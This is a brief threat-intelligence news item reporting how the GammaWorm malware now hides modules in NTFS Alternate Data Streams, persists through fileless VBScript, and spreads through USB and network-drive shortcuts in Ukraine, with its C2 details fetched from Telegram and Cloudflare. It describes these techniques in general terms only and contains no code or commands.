Updated: 01.06.2026 14:00 · First: 01.06.2026 14:00 · 📰 1 src / 1 articles · H score: 40

GammaWorm now has a more covert stage that hides its modules in NTFS Alternate Data Streams, letting it spread across Ukrainian networks while leaving few ordinary on-disk traces. It persists through fileless VBScript, scheduled tasks, and registry changes, then propagates via USB sticks and network drives using malicious shortcuts. The worm also pulls C2 details from public services such as Telegram and Cloudflare, keeping the backdoor reachable for operator commands. The stealthier design makes detection and cleanup harder and raises the risk of repeated reinfection.